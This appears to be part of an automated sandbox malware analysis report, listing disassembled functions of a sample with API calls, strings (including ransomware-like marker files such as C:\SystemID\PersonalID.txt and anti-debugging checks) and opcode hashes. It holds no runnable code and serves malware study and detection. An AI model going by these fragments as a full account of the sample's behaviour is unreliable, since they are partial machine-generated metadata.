                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 0041281F
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3705855051-0
                                                                                                  • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                  • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                  • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                  • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                  • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\asn1\tasn_new.c
                                                                                                  • API String ID: 2102423945-2878120539
                                                                                                  • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                  • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                  • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                    • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                    • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                    • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                    • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                    • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                    • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                    • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                  • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .\crypto\err\err.c$unknown
                                                                                                  • API String ID: 0-565200744
                                                                                                  • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                  • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0042419D
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2328436684-472376889
                                                                                                  • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                  • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: 8Q
                                                                                                  • API String ID: 3761405300-2096853525
                                                                                                  • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                  • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                    • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                  • _memset.LIBCMT ref: 00413C83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1327501947-3788999226
                                                                                                  • Opcode ID: f83b383ca6d2919a4d8d247e3e36b4910671b137cc7c3380ba7a871b92ce42e9
                                                                                                  • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                  • Opcode Fuzzy Hash: f83b383ca6d2919a4d8d247e3e36b4910671b137cc7c3380ba7a871b92ce42e9
                                                                                                  • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fputws$CreateDirectory
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2590308727-54166481
                                                                                                  • Opcode ID: 40e4798e336b28033a235bd3e43cee8aacca037ca1920e35a95d8556deac84ca
                                                                                                  • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                  • Opcode Fuzzy Hash: 40e4798e336b28033a235bd3e43cee8aacca037ca1920e35a95d8556deac84ca
                                                                                                  • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt
                                                                                                  • String ID: Assertion failed: %s, file %s, line %d
                                                                                                  • API String ID: 3494438863-969893948
                                                                                                  • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                  • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00480686
                                                                                                    • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                  Strings
                                                                                                  • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                  • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_raise
                                                                                                  • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                  • API String ID: 1484197835-3867593797
                                                                                                  • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                  • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM
                                                                                                  • API String ID: 757275642-2215902641
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%